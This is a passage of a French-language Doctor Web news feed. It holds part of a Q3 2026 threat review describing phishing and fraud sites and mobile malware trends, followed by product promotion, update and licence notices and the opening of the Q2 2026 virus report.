&lt;p class="text-center"&gt;&lt;em&gt;Le site propose de demander à être rappelé par un spécialiste ou d'appeler directement « l'opérateur de garde ».&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Lorsque l'utilisateur clique sur le premier bouton, le compte à rebours « En attente de votre demande » réapparaît et le processus se répète. Une fois le deuxième bouton pressé, les numéros de téléphone d'une « ligne d'assistance dédiée » s'affichent ; mais il s'agit en réalité de numéros frauduleux. L’objectif de ce stratagème est de faire paniquer davantage la victime potentielle après une attente forcée et de la rendre plus susceptible d’appeler l’un des numéros fournis, craignant une possible fuite de données personnelles et une perte d’accès au site web des services de l’État "Gosuslugi".&lt;br /&gt;De plus, les pirates font d'une pierre deux coups en dérobant directement les identifiants de connexion nécessaires pour accéder au compte personnel de l'utilisateur sur le site web du fournisseur d'énergie.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/35_scam_energ6.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/35_scam_energ6.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Pour accélérer la résolution du « problème », les victimes potentielles sont invitées à utiliser des numéros de téléphone pour une « ligne d'assistance dédiée ».&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Au cours des trois derniers mois, les analystes internet de Doctor Web ont continué à identifier de nouveaux sites web frauduleux promettant divers paiements et avantages. Certains d'entre eux usurpaient l’identité du site officiel de la plateforme gouvernementale russe « Travailler en Russie » &lt;em&gt;(trudvsem.ru)&lt;/em&gt;, qui publie des offres d'emploi et des CV et aide à la recherche d'emploi. De fausses sources en ligne affirmaient que les citoyens préalablement inscrits sur le portail officiel pouvaient bénéficier de paiements supplémentaires versés par le Centre pour l'emploi. Dans certains cas, les sommes promises pouvaient atteindre plusieurs dizaines de milliers de roubles.&lt;/p&gt;

&lt;p&gt;Pour « recevoir » l'argent, les utilisateurs devaient demander une carte bancaire MIR distincte, censée être uilisée pour verser les « avantages ». Ils devaient ensuite l'activer en effectuant un achat. Pour obtenir cette carte, les sites web frauduleux proposaient un formulaire dans lequel les utilisateurs étaient invités à renseigner leurs données personnelles : prénom, nom, patronyme, numéro de téléphone et adresse e-mail. &lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/36_fake_trud1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/36_fake_trud1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Le faux site web de la plateforme « Travailler en Russie » promettait un « paiement supplémentaire du Centre pour l'emploi » lors de l'inscription à une nouvelle carte bancaire.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Après avoir rempli le formulaire et cliqué sur le bouton « Demander une carte MIR », les visiteurs étaient redirigés vers le site web légitime d'une banque, où il leur était proposé de commander une nouvelle carte. Cependant, ces demandes n'avaient aucun lien avec l'obtention des avantages promis par les escrocs. Les escrocs poussaient leurs victimes potentielles à s'inscrire pour des cartes bancaires afin de recevoir une récompense pour chaque client parrainé avec succès, dans le cadre d'un programme de partenariat avec des établissements de crédit. Les utilisateurs n'ont finalement reçu aucun paiement du Centre pour l'emploi. De plus, les données personnelles collectées via les faux sites web de la plateforme « Travailler en Russie » auraient pu être utilisées par les cybercriminels dans d'autres escroqueries ou vendues au marché noir.&lt;/p&gt;

&lt;p&gt;Les données confidentielles pour accéder aux comptes bancaires en ligne, telles que les identifiants, les mots de passe et les informations de carte, demeurent une cible privilégiée des cybercriminels. Au troisième trimestre, nos experts ont identifié de nouveaux sites web de phishing créés pour voler ce type d'informations. Certains imitaient le site web d'un établissement de crédit russe et promettaient des cadeaux dans le cadre d'une « grande opération promotionnelle pour l'anniversaire de la société ». Les utilisateurs se voyaient proposer un bonus garanti, allant de 5 000 roubles au doublement du solde de leur compte.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/37_fake_bank_gift1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/37_fake_bank_gift1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un faux site web bancaire promettait des cadeaux à l'occasion de l'anniversaire de l'établissement de crédit.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;La victime potentielle était invitée à remplir un court questionnaire. Après avoir répondu aux questions, elle pouvait obtenir un « prix garanti » :&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/38_fake_bank_gift2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/38_fake_bank_gift2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Le site de phishing remerciait l’utilisateur pour ses réponses et l’informait que son compte était « prêt à participer à la promotion ». Afin de « découvrir le prix garanti », la victime potentielle est invitée à cliquer sur le bouton « Recevoir la récompense » (la capture d'écran ci-dessous montre une faute de frappe commise par les escrocs). &lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Après avoir cliqué sur le bouton « Recevoir » pour la récompense, l’utilisateur a vu apparaître un formulaire lui demandant de saisir ses nom et prénom, son numéro de téléphone portable et son numéro de carte bancaire.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/39_fake_bank_gift3.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/39_fake_bank_gift3.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Le site l’informait qu’il avait soi-disant reçu un double bonus sur son compte et que certaines informations personnelles étaient nécessaires pour « recevoir » l’argent.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Après la saisie des données, le site demandait un code de vérification par SMS, nécessaire « pour créditer le compte ». En réalité, il s'agissait d'un code de confirmation pour le compte bancaire en ligne de la victime, que les escrocs saisissaient à l'aide des données obtenues précédemment. Si la victime saisissait ce code, les escrocs accédaient à ses comptes bancaires et à ses cartes et pouvaient ainsi lui voler de l'argent.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/40_fake_bank_gift4.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/40_fake_bank_gift4.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Il est demandé à l'utilisateur de saisir un code de vérification reçu par SMS « pour créditer leur compte ».&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Les fausses plateformes de communication et de rencontres en ligne, utilisées par les criminels pour obtenir les informations personnelles et l'argent des utilisateurs, constituent toujours une menace importante. &lt;br /&gt;Au cours du troisième trimestre, les analystes Internet de Doctor Web ont identifié de nombreux sites web de ce type. Dans l’un des scénarios les plus courants, les escrocs incitent leurs victimes potentielles à souscrire à un abonnement premium, prétendument nécessaire pour activer leur compte et débloquer toutes les fonctionnalités du service, notamment la messagerie. Cependant, le paiement demandé n'est pas ponctuel : l'accès aux discussions est conditionné à l'acceptation du renouvellement automatique de l'abonnement. En obtenant le consentement de leurs victimes à des paiements récurrent, les escrocs espèrent que celles-ci oublieront leur abonnement ou, pour une raison quelconque, ne pensons pas à le résilier.&lt;/p&gt;

&lt;p&gt;Dans le cadre de cette escroquerie, les victimes potentielles peuvent être redirigées, via une série de redirections web (par exemple, lors de la consultation d'autres sites web), vers des sites intermédiaires faisant la promotion d'un service de rencontres en ligne. Les visiteurs sont invités à remplir un questionnaire afin de déterminer leur compatibilité avec des partenaires potentiels. À l’issue du questionnaire, un formulaire d'inscription leur est présenté. Ce formulaire leur demande un nom d'utilisateur, un mot de passe et une adresse électronique. Ils sont ensuite redirigés directement vers le site web de la plateforme de rencontres en ligne.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/41_fake_date1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/41_fake_date1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Le site web de cette arnaque « vérifie » la compatibilité de la victime potentielle avec d'autres utilisateurs.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Presque immédiatement, les utilisateurs commencent à recevoir des messages de participants « intéressés », qui sont en réalité des messages automatisés et non des messages provenant de personnes réelles. Il est toutefois impossible de répondre à ces messages : pour « poursuivre la communication », le site vous invite à activer votre compte en achetant un accès premium et en acceptant un renouvellement automatique de l’abonnement tous les 30 jours.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/42_fake_date2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/42_fake_date2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Lors du paiement d’un « abonnement premium », ces sites web peuvent afficher un formulaire non sécurisé vous demandant de saisir les informations de votre carte bancaire, notamment son numéro, sa date d’expiration et même un code de sécurité à trois chiffres. Le formulaire n'est pas relié à des plateformes de paiement sécurisées. Les utilisateurs risquent donc non seulement de s'abonner à un service coûteux, mais également de perdre la totalité des fonds disponibles sur leur carte en partageant leurs informations avec un tiers inconnu.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/43_fake_date3_pay_subscr.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/43_fake_date3_pay_subscr.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Les informations de carte bancaire sont demandées via un formulaire non sécurisé.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Si un utilisateur tente d'annuler son abonnement ou de se faire rembourser un paiement déjà effectué, les sites web redemandent ses informations de carte bancaire (par exemple, la date d'expiration et une partie du numéro de carte). Ce type de demande se produit également en dehors des plateformes de paiement sécurisées, ce qui accroît les risques de fuite et de vol de données confidentielles.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/44_fake_date4.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/october/review_common_q3/44_fake_date4.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Lors d'une demande d'annulation d'abonnement payant, le site exige les six premiers et les quatre derniers chiffres de votre carte bancaire, ainsi que sa date d'expiration.&lt;/em&gt;&lt;/p&gt;

&lt;div class="notrecommend"&gt;
    &lt;a href="https://antifraud.drweb.fr/dangerous_urls/"&gt;En savoir plus sur les sites web déconseillés par l'antivirus Dr.Web.&lt;/a&gt;
&lt;/div&gt;

&lt;h3&gt;Logiciels malveillants et indésirables ciblant les appareils mobiles&lt;/h3&gt;

&lt;p&gt;D'après les statistiques de détection de Dr.Web Security Space pour les appareils mobiles, le logiciel malveillant le plus actif au troisième trimestre 2026 étaient les Trojans &lt;a href="https://vms.drweb.fr/search/?q=Android.Proxy&amp;lng=fr"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;, qui ont été utilisés pour rediriger le trafic réseau des cybercriminels via les appareils des victimes. Les modifications les plus fréquemment rencontrées par les utilisateurs étaient &lt;a href="https://vms.drweb.fr/search/?q=Android.Proxy&amp;lng=fr"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.60.origin&lt;/b&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Android.Proxy&amp;lng=fr"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.61.origin&lt;/b&gt; — représentant près d'un quart des détections de logiciels malveillants. Par rapport au deuxième trimestre, le nombre d'attaques menées par les Trojans bancaires &lt;a href="https://vms.drweb.fr/search/?q=Android.Banker&amp;lng=fr"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; a augmenté. La tendance à la baisse de l'activité des chevaux de Troie publicitaires &lt;a href="https://vms.drweb.fr/search/?q=Android.MobiDash&amp;lng=fr"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Android.HiddenAds&amp;lng=fr"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; s'est poursuivie.&lt;/p&gt;

&lt;p&gt;Les programmes indésirables les plus courants sont une fois de plus de faux antivirus appelés &lt;a href="https://vms.drweb.fr/search/?q=Program.FakeAntiVirus&amp;lng=fr"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;, qui proposent d'acheter la version complète pour traiter des menaces prétendument détectées. Les programmes publicitaires les plus courants étaient ceux dotés de modules &lt;a href="https://vms.drweb.fr/search/?q=Adware.AdPush&amp;lng=fr"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Adware.Airpush&amp;lng=fr"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt; intégrés, qui affichent des notifications publicitaires, et Adware.Opensite.15. Ces derniers sont distribués sous couvert de logiciels de triche pour les jeux, mais leur seule fonction est de surcharger les sites web de publicités.&lt;/p&gt;

&lt;p&gt;Les applications auxquelles on a injecté du code poubelle (scrapcode) (détecté comme &lt;a href="https://vms.drweb.fr/search/?q=Tool.Obfuscator.TrashCode&amp;lng=fr"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;), à l'aide de l'outil de piratage et de modification NP Manager restent les logiciels potentiellement dangereux les plus courants. Les créateurs de virus continuent d'utiliser cette modification pour protéger les logiciels malveillants, notamment les chevaux de Troie bancaires, contre la détection par les logiciels antivirus. D'autres modifications créées avec NP Manager et détectées par Dr.Web sous le nom &lt;a href="https://vms.drweb.fr/search/?q=Tool.NPMod&amp;lng=fr"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt; restent largement répandues. Elles peuvent notamment utiliser des techniques d’obfuscation du code pour se protéger davantage contre la détection et l'analyse. Parmi les logiciels potentiellement dangereux les plus fréquemment rencontrés au troisième trimestre figuraient également des programmes modifiés à l'aide de l’utilitaire &lt;a href="https://vms.drweb.fr/search/?q=Tool.LuckyPatcher&amp;lng=fr"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;. Cet outil télécharge sur Internet des scripts pouvant être potentiellement malveillants.&lt;/p&gt;

&lt;p&gt;Au cours des trois derniers mois, les analystes antivirus de Doctor Web ont découvert plus de 50 applications malveillantes dans le catalogue Google Play.&lt;br /&gt;Parmi eux figuraient des dizaines de chevaux de Troie &lt;a href="https://vms.drweb.fr/search/?q=Android.Joker&amp;lng=fr"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, qui abonnent leurs victimes à des services payants. Nos experts ont découvert que certaines nouvelles versions de cette famille de logiciels malveillants ont acquis de nouvelles fonctionnalités leur permettant d'utiliser les appareils infectés comme nœuds de sortie de botnets proxy pour rediriger le trafic internet des attaquants. Les Trojans &lt;a href="https://vms.drweb.fr/search/?q=Android.FakeApp&amp;lng=fr"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, utilisé par les pirates dans divers escroqueries, ont également été diffusés sur Google Play.&lt;/p&gt;

&lt;p&gt;Les événements les plus importants du 3e trimestre liés à la sécurité des appareils mobiles :&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;Une forte activité des chevaux de Troie &lt;a href="https://vms.drweb.fr/search/?q=Android.Proxy&amp;lng=fr"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt; a été observée, permettant aux attaquants de rediriger le trafic réseau via des appareils infectés.&lt;/li&gt;
    &lt;li&gt;Le nombre d’attaques des Trojans bancaires &lt;a href="https://vms.drweb.fr/search/?q=Android.Banker&amp;lng=fr"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; a augmenté.&lt;/li&gt;
    &lt;li&gt;L'activité des chevaux de Troie publicitaires &lt;a href="https://vms.drweb.fr/search/?q=Android.MobiDash&amp;lng=fr"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Android.HiddenAds&amp;lng=fr"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; a continué de diminuer.&lt;/li&gt;
    &lt;li&gt;Les créateurs de virus ont ajouté une fonctionnalité aux applications malveillantes &lt;a href="https://vms.drweb.fr/search/?q=Android.Joker&amp;lng=fr"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, qui permet aux appareils infectés de servir de nœuds de sortie pour un botnet proxy.&lt;/li&gt;
    &lt;li&gt;Des applications malveillantes ont de nouveau été distribuées via Google Play.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Pour en savoir plus sur la situation virale concernant les appareils mobiles au troisième trimestre 2026, consultez &lt;a href="https://news.drweb.fr/show/review/?i=15305" target="_blank"&gt;notre rapport&lt;/a&gt;.&lt;/p&gt;</description></item><item><guid>https://news.drweb.fr/show/?i=15298&amp;lng=fr</guid><title>Bientôt la rentrée avec Dr.Web ! Profitez de 15 % de remise et d’un mois supplémentaire de protection pour votre ordinateur à domicile</title><link>https://news.drweb.fr/show/?i=15298&amp;lng=fr&amp;c=5</link><pubDate>Wed, 26 Aug 2026 14:45:16 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;À l’approche de la rentrée scolaire, Doctor Web lance une campagne spéciale « Bientôt la rentrée » pour vous aider à protéger l’univers numérique de vos enfants.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Du 26 août au 2 septembre&lt;/strong&gt;, profitez de tarifs spéciaux pour protéger vos ordinateurs personnels. À l'achat d'une nouvelle licence d’un an de&lt;strong&gt; Dr.Web Security Space&lt;/strong&gt;, bénéficiez d'une remise garantie de 15 % et d'un mois de protection supplémentaire offert.&lt;/p&gt;&lt;p&gt;Il vous suffit de sélectionner le nombre d'appareils à protéger :&lt;/p&gt;&lt;ul&gt;&lt;li&gt;2 PC&lt;/li&gt;&lt;li&gt;3 PC&lt;/li&gt;&lt;li&gt;4 PC&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Dr.Web Security Space protège les ordinateurs et portables de vos enfants contre toutes les menaces en ligne, les aide à éviter les distractions liées aux loisirs et les avertit en cas de liens dangereux ou de tentatives d’escroquerie.&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;a class="btn" href="https://www.drweb.fr/landing/school2026?utm_source=drweb&amp;amp;utm_medium=news&amp;amp;utm_campaign=school2026"&gt;Profiter de la remise + 1 mois offert&lt;/a&gt;&lt;/p&gt;&lt;p&gt;Assurez la sécurité de vos enfants dès aujourd'hui : avec Dr.Web, la rentrée sera plus sereine et l’année scolaire plus productive.&lt;/p&gt;&lt;p&gt;&lt;a href="https://f2.drweb.com/get+meta+file/?k=354174f09cd83ded5b3ab86d53c3823e&amp;amp;sdl=fr&amp;amp;sdf=t"&gt;Conditions détaillées de la promotion&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;i&gt;Sans obligation d'achat.&lt;/i&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.fr/show/?i=15291&amp;lng=fr</guid><title>Mise à jour du serveur de gestion centralisée pour Dr.Web Enterprise Security Suite et Dr.Web Industrial</title><link>https://news.drweb.fr/show/?i=15291&amp;lng=fr&amp;c=5</link><pubDate>Thu, 30 Jul 2026 09:41:43 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;&lt;span lang="FR"&gt;Doctor Web publie une mise à jour pour le serveur au sein de Dr.Web Enterprise Security Suite et Dr.Web Industrial en version 13.0.1.202606110. La nouvelle version sera disponible au téléchargement à partir du 27 juillet 2026, via l'interface web de la console de gestion.&amp;nbsp;&lt;/span&gt;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;&lt;span lang="FR"&gt;&lt;strong&gt;Quelles sont les nouveautés de cette mise à jour ?&amp;nbsp;&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span lang="FR"&gt;Cette version vise principalement à améliorer la stabilité du fonctionnement du Centre de gestion et à corriger quelques bugs identifiés dans la version précédente. En particulier, les problèmes d'affichage des éléments enfants lors du filtrage dans l'arborescence du réseau antivirus ont été résolus, et les erreurs d'envoi de notifications aux administrateurs et de génération de rapports ont été corrigées. La liste complète des modifications est disponible dans le &lt;/span&gt;&lt;a href="https://news.drweb.fr/changelog/"&gt;&lt;span lang="FR"&gt;Changelog&lt;/span&gt;&lt;/a&gt;&lt;span lang="FR"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span lang="FR"&gt;&lt;strong&gt;Impact sur les agents (y compris Dr.Web Industrial)&amp;nbsp;&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span lang="FR"&gt;La mise à jour du serveur n'affecte pas le fonctionnement des agents sur les nœuds protégés. Le processus de mise à jour du composant serveur ne nécessite pas de redémarrage ou de reconfiguration du logiciel agent : ils continueront à fonctionner normalement. Pour les environnements industriels où est utilisé Dr.Web Industrial, cela signifie l'absence de tout changement dans le fonctionnement des agents, puisque tous les correctifs concernent exclusivement la partie serveur et l'interface de gestion.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span lang="FR"&gt;&lt;strong&gt;Important :&lt;/strong&gt; Le serveur Dr.Web redémarrera automatiquement pendant l'installation de la mise à jour. Nous recommandons de planifier cette procédure à l'avance, pendant les heures de charge minimale.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span lang="FR"&gt;N'oubliez pas que les mises à jour régulières sont essentielles pour maintenir le niveau de protection requis et le fonctionnement optimal du logiciel.&lt;/span&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.fr/show/?i=15284&amp;lng=fr</guid><title>Mise à jour du composant antispam dans Dr.Web Enterprise Security Suite et Dr.Web sur abonnement</title><link>https://news.drweb.fr/show/?i=15284&amp;lng=fr&amp;c=5</link><pubDate>Wed, 15 Jul 2026 14:29:02 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Doctor Web publie la mise à jour du module antispam 1.1.2.202604160 au sein de Dr.Web Enterprise Security Suite et Dr.Web sur abonnement. La mise à jour sera disponible en téléchargement à partir du 20 juillet 2026&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Le module analyse le trafic de messagerie en temps réel et examine les composants des courriels : en-tête, corps, liens hypertextes et pièces jointes. Le fonctionnement du composant est équilibré et n'affecte pas les performances du client de messagerie.&lt;/p&gt;&lt;p&gt;La nouvelle version propose une détection de spam et une analyse des liens améliorées, ainsi que quelques modifications internes. Une mise à jour &lt;a href="https://news.drweb.fr/show/?lng=fr&amp;amp;i=14979"&gt;majeure avait &lt;/a&gt;été précédemment publiée, améliorant l'efficacité de la reconnaissance et du filtrage du trafic indésirable.&lt;/p&gt;&lt;p&gt;Instructions pour les utilisateurs de Windows XP. Si l’option permettant de mettre à jour uniquement les bases de données virales est activée, le plugin Dr.Web pour Microsoft Outlook ne fonctionnera pas correctement : tous les courriels entrants seront détectés comme spam. Pour vérifier : Dans les paramètres du programme, sélectionnez « Mise à jour », puis cliquez sur « Paramètres avancés » et accédez à la section « Composants mis à jour ».&lt;/p&gt;&lt;p&gt;Nous recommandons aux utilisateurs de ce système d’exploitation de mettre à jour leur OS vers une version plus récente ou d’activer les mises à jour de tous les modules du programme dans les paramètres, et non seulement celles des bases de données virales.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.fr/show/?i=15285&amp;lng=fr</guid><title>Le contrat de licence des logiciels Dr.Web a été mis à jour</title><link>https://news.drweb.fr/show/?i=15285&amp;lng=fr&amp;c=5</link><pubDate>Wed, 15 Jul 2026 14:43:47 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Doctor Web a mis à jour le contrat de licence de ses produits logiciels. Vous pouvez consulter le document actualisé sur le lien &lt;a href="https://license.drweb.com/agreement/."&gt;https://license.drweb.com/agreement/.&lt;/a&gt;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Liste des modifications :&lt;/p&gt;&lt;ul&gt;&lt;li&gt;le texte a été structuré en sections thématiques pour faciliter la navigation;&lt;/li&gt;&lt;li&gt;les termes ont été définis afin d’améliorer la compréhension du document et d’éviter les malentendus;&lt;/li&gt;&lt;li&gt;la distinction entre l'utilisation autorisée et l'utilisation sans licence des logiciels Dr.Web a été clarifiée;&lt;/li&gt;&lt;li&gt;des réponses aux questions fréquemment posées par les utilisateurs sont disponibles: sur quels appareils la licence achetée peut être utilisée, faut-il être propriétaire de l'appareil protégé, etc.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;En utilisant le logiciel Dr.Web après l'entrée en vigueur de la nouvelle version du Contrat de Licence, vous confirmez votre acceptation pleine et entière des nouvelles conditions. Si vous n'acceptez pas ces modifications, vous devez désinstaller le logiciel Dr.Web de vos appareils.&lt;/p&gt;&lt;p&gt;Veuillez noter que ce document s'applique à tous les logiciels de la gamme Dr.Web, à l'exception de Dr.Web FixIt! et Dr.Web vxCube. Ces deux solutions sont soumises à leurs propres contrats de licence.&lt;/p&gt;</description></item><item><guid>https://news.drweb.fr/show/?i=15275&amp;lng=fr</guid><title>Doctor Web : rapport viral du 2e trimestre 2026</title><link>https://news.drweb.fr/show/?i=15275&amp;lng=fr&amp;c=5</link><pubDate>Mon, 13 Jul 2026 09:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;le 13 juillet 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Selon les statistiques de détection récoltées par l'antivirus Dr.Web, le nombre total de menaces détectées lors du deuxième trimestre 2026 a augmenté de 5,72% par rapport au premier trimestre. Le nombre de menaces uniques a également augmenté de 95,32%. Les menaces les plus fréquemment détectées sur les appareils protégés étaient les logiciels publicitaires, les chevaux de Troie publicitaires, les programmes de minage malveillants et les chevaux de Troie utilisés pour lancer d'autres menaces.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Les scripts malveillants et les chevaux de Troie les plus fréquemment détectés dans le trafic de messagerie incluaient des téléchargeurs, des droppers, des voleurs de mots de passe et des mineurs de cryptomonnaie. Les portes dérobées, les documents de phishing et divers exploits ont également été largement répandus.&lt;/p&gt;

&lt;p&gt;Les utilisateurs dont les fichiers ont été affectés par des rançongiciels ont été les plus susceptibles de rencontrer des encodeurs &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; et &lt;b&gt;Trojan.Encoder.37400&lt;/b&gt;. Dans le même temps, le nombre de demandes de déchiffrement reçues par le support technique de Doctor Web a légèrement diminué par rapport au trimestre précédent.&lt;/p&gt;

&lt;p&gt;Au deuxième trimestre 2026, les analystes Internet de Doctor Web ont constaté une augmentation des attaques de phishing ayant visé les utilisateurs de MAX Messenger. Les pirates ont également exploité les tendances de l'actualité et adapté les arnaques populaires à leurs propres intérêts.&lt;/p&gt;

&lt;p&gt;En avril, il a été découvert qu'une mise à jour de Microsoft Visual Studio Code &lt;a href="https://news.drweb.ru/show/?i=15146" target="_blank"&gt;contenait du code malveillant&lt;/a&gt;. Il s'agissait d'un cheval de Troie dissimulé dans la bibliothèque JavaScript publique es5-ext, incluse dans la mise à jour. Ce script s'exécute lorsque le fuseau horaire correspond à celui de certaines villes russes et affiche un message anti-russe dans la console du développeur.&lt;/p&gt;

&lt;p&gt;En mai nous avons alerté sur la &lt;a href="https://news.drweb.fr/show/?lng=fr&amp;i=15253" target="_blank"&gt;propagation du logiciel malveillant JobStealer&lt;/a&gt;, qui ciblait les utilisateurs de Mac et de Windows. Les cybercriminels le dissimulaient sous l'apparence d'un logiciel d'entretien d'embauche en ligne. Le cheval de Troie JobStealer vole diverses informations confidentielles, notamment des données provenant d'environ 300 extensions de navigateur/portefeuilles de cryptomonnaie, des fichiers de messagerie Telegram, des mots de passe et des informations de cartes bancaires enregistrés dans les navigateurs, ainsi que des cookies.&lt;/p&gt;

&lt;p&gt;En juin, des spécialistes du laboratoire antivirus de Doctor Web ont rapporté un &lt;a href="https://news.drweb.fr/show/?lng=fr&amp;i=15262" target="_blank"&gt;nouveau cheval de Troie publicitaire&lt;/a&gt;, &lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, capable d'afficher des publicités en arrière-plan en contournant les restrictions du système d'exploitation Android. Pour ce faire, le cheval de Troie exploite des applications tierces, en choisissant la méthode nécessaire en fonction du fabricant de l'appareil cible.&lt;/p&gt;

